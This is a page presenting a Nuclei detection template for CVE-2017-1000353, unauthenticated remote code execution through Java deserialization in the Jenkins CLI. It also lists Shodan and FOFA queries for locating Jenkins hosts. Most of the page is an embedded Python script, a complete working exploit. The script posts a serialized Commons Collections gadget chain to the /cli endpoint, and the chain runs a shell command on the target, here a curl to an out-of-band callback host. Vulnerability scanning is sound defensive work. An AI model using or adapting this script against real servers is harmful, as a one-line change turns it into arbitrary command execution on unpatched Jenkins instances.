Jenkins CLI - Java Deserialization

ID: CVE-2017-1000353

Severity: critical

Author: hnd3884

Tags: cve,cve2017,jenkins,rce

Description

Jenkins versions 2.56 and earlier as well as 2.46.1 LTS and earlier are vulnerable to an unauthenticated remote code execution. An unauthenticated remote code execution vulnerability allowed attackers to transfer a serialized Java SignedObject object to the Jenkins CLI, that would be deserialized using a new ObjectInputStream, bypassing the existing blacklist-based protection mechanism. We’re fixing this issue by adding SignedObject to the blacklist. We’re also backporting the new HTTP CLI protocol from Jenkins 2.54 to LTS 2.46.2, and deprecating the remoting-based (i.e. Java serialization) CLI protocol, disabling it by default.

YAML Source

id: CVE-2017-1000353

info:
  name: Jenkins CLI - Java Deserialization
  author: hnd3884
  severity: critical
  description: |
    Jenkins versions 2.56 and earlier as well as 2.46.1 LTS and earlier are vulnerable to an unauthenticated remote code execution. An unauthenticated remote code execution vulnerability allowed attackers to transfer a serialized Java `SignedObject` object to the Jenkins CLI, that would be deserialized using a new `ObjectInputStream`, bypassing the existing blacklist-based protection mechanism. We're fixing this issue by adding `SignedObject` to the blacklist. We're also backporting the new HTTP CLI protocol from Jenkins 2.54 to LTS 2.46.2, and deprecating the remoting-based (i.e. Java serialization) CLI protocol, disabling it by default.
  reference:
    - http://packetstormsecurity.com/files/159266/Jenkins-2.56-CLI-Deserialization-Code-Execution.html
    - https://www.exploit-db.com/exploits/41965/
    - https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2017-1000353
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-1000353
    cwe-id: CWE-502
    epss-score: 0.97201
    epss-percentile: 0.99862
    cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:*:*:*:*
  metadata:
    vendor: jenkins
    product: jenkins
    shodan-query:
      - cpe:"cpe:2.3:a:jenkins:jenkins"
      - http.favicon.hash:"81586312"
      - product:"jenkins"
      - x-jenkins
    fofa-query: icon_hash=81586312
  tags: cve,cve2017,jenkins,rce

variables:
  OAST: "{{interactsh-url}}"
  ROOTURL: "{{RootURL}}"

code:
  - engine:
      - py
      - python3
    source: |
      import requests
      import uuid
      import threading
      import time
      import os
      import struct

      CMD = 'curl https://' + os.getenv('OAST')
      URL = '%s/cli' % os.getenv('ROOTURL').rstrip('/')
      PREAMLE = b'<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4='
      PROTO = b'\x00\x00\x00\x00'

      def java_string(s):
          length = len(s)
          packed_length = struct.pack(">H", length)
          return packed_length + s.encode()

      def download(url, session):
          headers = {'Side' : 'download'}
          headers['Content-type'] = 'application/x-www-form-urlencoded'
          headers['Session'] = session
          headers['Transfer-Encoding'] = 'chunked'
          r = requests.post(url, data=b' ', headers=headers,  stream=True, verify=False)
          print(r.content)

      def upload(url, session, data):
          headers = {'Side' : 'upload'}
          headers['Session'] = session
          headers['Content-type'] = 'application/octet-stream'
          headers['Accept-Encoding'] = None
          r = requests.post(url,data=data,headers=headers, verify=False)

      def upload_chunked(url,session):
          headers = {'Side' : 'upload'}
          headers['Session'] = session
          headers['Content-type'] = 'application/octet-stream'
          headers['Accept-Encoding']= None
          headers['Transfer-Encoding'] = 'chunked'
          headers['Cache-Control'] = 'no-cache'

          r = requests.post(url, headers=headers, data=create_payload_chunked(),  verify=False)
          print(r.content.hex())

      def create_payload_chunked():
          yield PREAMLE
          yield PROTO
          yield create_payload(CMD)

      def create_payload(cmd):
          serialized = "aced00057372002f6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e5265666572656e63654d61701594ca03984908d7030000787077110000000000000001003f40000000000010737200286a6176612e7574696c2e636f6e63757272656e742e436f70794f6e577269746541727261795365744bbdd092901569d70200014c0002616c74002b4c6a6176612f7574696c2f636f6e63757272656e742f436f70794f6e577269746541727261794c6973743b7870737200296a6176612e7574696c2e636f6e63757272656e742e436f70794f6e577269746541727261794c697374785d9fd546ab90c303000078707704000000027372002a6a6176612e7574696c2e636f6e63757272656e742e436f6e63757272656e74536b69704c697374536574dd985079bdcff15b0200014c00016d74002d4c6a6176612f7574696c2f636f6e63757272656e742f436f6e63757272656e744e6176696761626c654d61703b78707372002a6a6176612e7574696c2e636f6e63757272656e742e436f6e63757272656e74536b69704c6973744d6170884675ae061146a70300014c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b7870707372001a6a6176612e73656375726974792e5369676e65644f626a65637409ffbd682a3cd5ff0200035b0007636f6e74656e747400025b425b00097369676e617475726571007e000e4c000c746865616c676f726974686d7400124c6a6176612f6c616e672f537472696e673b7870757200025b42acf317f8060854e002000078700000050baced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001b00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001b7371007e00137571007e001800000002707571007e001800000000740006696e766f6b657571007e001b00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e00187371007e0013757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b47020000787000000001740012746f756368202f746d702f686f616e676e64740004657865637571007e001b0000000171007e00207371007e000f737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000000770800000010000000007878787571007e00110000002f302d021439e722dbd82414a747c2de0e7d831a1264e0ab5902150084604637b41649a8ba9799fe2cc0590574cf970e740003445341737200116a6176612e6c616e672e426f6f6c65616ecd207280d59cfaee0200015a000576616c75657870017078737200316f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e7365742e4c6973744f726465726564536574fcd39ef6fa1ced530200014c00087365744f726465727400104c6a6176612f7574696c2f4c6973743b787200436f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e7365742e416273747261637453657269616c697a61626c655365744465636f7261746f72110ff46b96170e1b0300007870737200156e65742e73662e6a736f6e2e4a534f4e41727261795d01546f5c2872d20200025a000e657870616e64456c656d656e74734c0008656c656d656e747371007e0018787200186e65742e73662e6a736f6e2e41627374726163744a534f4ee88a13f4f69b3f82020000787000737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a657870000000017704000000017400046173646678787371007e001e00000000770400000000787871007e00207371007e00027371007e000577040000000271007e001a71007e00097871007e00207078".replace("0012746f756368202f746d702f686f616e676e64",java_string(cmd).hex()).replace('050baced000573', struct.pack(">H", 1291 + len(cmd)-18).hex()  + 'aced000573')
          return bytes.fromhex(serialized)

      def main():
          session = str(uuid.uuid4())
          t = threading.Thread(target=download, args=(URL, session))
          t.start()
          time.sleep(2)
          upload_chunked(URL, session)

      main()

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
        condition: and
# digest: 4a0a00473045022003497add318e43154d20f752633565cadb8c406ddac3e6661b034e20594acfc1022100d947b1c765918742118b4ec4c926376292eb19715157a299d04aa01aab3fa1d6:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "code/cves/2017/CVE-2017-1000353.yaml"

View on Github